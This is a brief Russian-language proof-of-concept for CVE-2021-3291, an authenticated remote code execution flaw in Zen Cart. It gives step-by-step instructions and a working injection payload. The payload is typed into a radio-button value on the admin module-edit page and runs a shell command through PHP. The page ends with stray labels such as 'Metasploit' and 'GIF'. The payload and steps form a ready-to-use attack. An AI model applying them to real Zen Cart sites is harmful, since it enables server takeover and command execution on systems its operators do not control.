
Эксплойт для аутентифицированного удалённого выполнения кода в Zen Cart через SQL-инъекцию в редактировании модулей администратора. PoC для CVE-2021-3291.
1-) войдите как администратор
2-) откройте страницу редактирования любого модуля
3-) инспектируйте элемент любого радиопереключателя со значением true
4-) измените true на true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo `id`; //
5-) нажмите «Обновить»
6-) чтобы выполнить команду, снова откройте страницу редактирования
CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291
POC
эксплуатация
обновление страницы
увеличение

Metasploit

GIF
